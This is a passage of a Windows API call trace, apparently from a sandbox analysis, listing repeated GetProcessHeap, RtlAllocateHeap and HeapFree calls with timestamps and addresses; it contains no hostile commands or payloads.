[0100.380] GetProcessHeap () returned 0xe30000 [0100.380] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.380] GetProcessHeap () returned 0xe30000 [0100.380] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.380] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.381] GetProcessHeap () returned 0xe30000 [0100.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.381] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.382] GetProcessHeap () returned 0xe30000 [0100.382] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.382] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.383] GetProcessHeap () returned 0xe30000 [0100.383] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0100.383] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.384] GetProcessHeap () returned 0xe30000 [0100.384] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.385] GetProcessHeap () returned 0xe30000 [0100.385] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.385] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.386] GetProcessHeap () returned 0xe30000 [0100.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.386] GetProcessHeap () returned 0xe30000 [0100.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.387] GetProcessHeap () returned 0xe30000 [0100.387] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0100.388] GetProcessHeap () returned 0xe30000 [0100.388] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0100.389] GetProcessHeap () returned 0xe30000 [0100.389] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, 